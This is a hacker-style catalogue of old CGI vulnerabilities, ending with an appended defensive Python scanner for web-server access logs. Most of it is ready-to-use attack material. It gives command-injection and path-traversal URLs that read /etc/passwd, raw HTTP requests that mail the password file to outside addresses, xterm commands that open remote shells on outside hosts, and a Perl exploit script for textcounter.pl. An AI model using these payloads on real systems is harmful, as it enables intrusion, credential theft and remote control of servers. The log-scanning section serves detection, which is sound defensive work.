A Collection of CGI Vulnerabilities

1. phf
The phf bug is probably the most classic of them all; nearly every article covers it. It lets you execute commands on the server, for example displaying /etc/passwd:
lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
But can we still find one anywhere?

2. php.cgi
Versions 2.0beta10 and earlier can read any file readable by the nobody user:
lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd
php.cgi 2.1 can only read .shtml files.
A note on the password file, comrades: it may also be at /etc/master.passwd, /etc/security/passwd, and so on.

3. whois_raw.cgi
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd
lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0

4. faxsurvey
lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

5. textcounter.pl
If the server has textcounter.pl, anyone can execute commands with the privileges of the HTTP daemon.

#!/usr/bin/perl
$URL='http://dtp.kappa.ro/a/test.shtml';    # please _DO_ _modify_ this
$EMAIL='pdoru@pop3.kappa.ro,root';          # please _DO_ _modify_ this
if ($ARGV[0]) {
    $CMD=$ARGV[0];
} else {
    $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one";
}
$text="${URL}/;IFS=\8;${CMD};echo|";
$text =~ s/ /\$\{IFS\}/g;
#print "$text\n";
system({"wget"} "wget", $text, "-O/dev/null");
system({"wget"} "wget", $text, "-O/dev/null");
#system({"lynx"} "lynx", $text);
# lynx can be used instead if wget is not available:
#system({"lynx"} "lynx", $text);

6. info2www
A vulnerability in some versions (1.1) of info2www:
$ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami </etc/passwd|)'
$
You have new mail.
$
To be honest, I don't really understand this one. :(

7. pfdispaly.cgi
lynx -source 'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
pfdisplay.cgi has another vulnerability that allows command execution:
lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
or
lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

8. wrap
lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc

9. www-sql
This lets you read some access-restricted pages. For example, entering http://your.server/protected/something.html in your browser prompts for a username and password, but with www-sql that is not needed:
http://your.server/cgi-bin/www-sql/protected/something.html

10. view-source
lynx http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/passwd

11. campas
lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

12. webgais
telnet www.victim.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)

query=';mail+drazvan\@pop3.kappa.ro</etc/passwd;echo'&output=subject&domain=paragraph

13. websendmail
telnet www.victim.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)

receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a&subject=a&content=a

14. handler
telnet www.victim.com 80
GET /cgi-bin/handler/useless_shit;cat<tab>/etc/passwd|?data=Download HTTP/1.0
or
GET /cgi-bin/handler/blah;xwsh<tab>-display<tab>yourhost.com|?data=Download
or
GET /cgi-bin/handler/<tab>;xterm<tab>-display<tab>danish:0<tab>-e<tab>/bin/sh|<tab>?data=Download
Note that what follows cat is a TAB key, not a space. The server will report that it cannot open useless_shit, but it still executes the command that follows.

15. test-cgi
lynx http://www.victim.com/cgi-bin/test-cgi?\whatever

CGI/1.0 test script report:

argc is 0. argv is .

SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = victim.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html, application/html, text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/
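Nearly every entry above abuses the same few request-level tricks (an embedded %0a newline, "../" traversal, or a shell separator riding along in a CGI argument), so a defender can spot such probes in the access log. The following Python is an added example, not code from the original page; it assumes Apache common log format and uses constructed log lines containing three of the probes listed above.

```python
import re
from urllib.parse import unquote

# CGI programs named in the list above (pfdispaly.cgi is the page's spelling).
KNOWN_CGI = {
    "phf", "php.cgi", "whois_raw.cgi", "faxsurvey", "textcounter.pl",
    "info2www", "pfdispaly.cgi", "pfdisplay.cgi", "wrap", "www-sql",
    "view-source", "campas", "webgais", "websendmail", "handler", "test-cgi",
}

# Traits shared by the probes above, checked after URL decoding: a newline that ends
# the intended argument, "../" traversal, shell separators, and the files being read.
MARKERS = {
    "newline": re.compile(r"[\r\n]"),
    "traversal": re.compile(r"\.\./"),
    "shell-meta": re.compile(r"[;|`]"),
    "sensitive-file": re.compile(r"/etc/(?:passwd|master\.passwd|security/passwd|shadow)"),
}

# Apache common log format (assumed): client ident user [time] "request" status size
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]*\] "\S+ (?P<url>\S+)[^"]*" (?P<status>\d{3})')


def analyze_line(line):
    """Return a finding for one log line that hits /cgi-bin/, or None if it looks clean."""
    m = LOG_RE.match(line)
    if not m or "/cgi-bin/" not in m.group("url"):
        return None
    # decode once; the handler probe separates arguments with tabs (%09), not spaces
    decoded = unquote(m.group("url")).replace("\t", " ")
    rest = decoded.split("/cgi-bin/", 1)[1]
    script = re.split(r"[/?]", rest, maxsplit=1)[0]
    hits = [name for name, rx in MARKERS.items() if rx.search(decoded)]
    if script in KNOWN_CGI:
        hits.insert(0, "known-cgi:" + script)
    if not hits:
        return None
    return {"client": m.group("client"), "script": script, "status": int(m.group("status")), "hits": hits}


def scan(lines):
    """Run analyze_line over a whole log and keep only the findings."""
    return [f for f in map(analyze_line, lines) if f]


# Constructed sample log: three probes from the list above plus two benign requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/1999:03:14:07 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1187',
    '10.0.0.5 - - [12/Mar/1999:03:14:09 +0000] "GET /cgi-bin/view-source?../../../../../../../etc/passwd HTTP/1.0" 200 1187',
    '10.0.0.9 - - [12/Mar/1999:03:15:00 +0000] "GET /cgi-bin/handler/x;cat%09/etc/passwd|?data=Download HTTP/1.0" 404 211',
    '192.168.1.2 - - [12/Mar/1999:03:16:30 +0000] "GET /cgi-bin/counter.pl?page=index HTTP/1.0" 200 44',
    '192.168.1.3 - - [12/Mar/1999:03:17:01 +0000] "GET /index.html HTTP/1.0" 200 2048',
]
```

A 404 on a handler probe (third sample line) still deserves attention: the text above notes that handler reports the open failure yet runs the trailing command, so the status code alone says nothing about success.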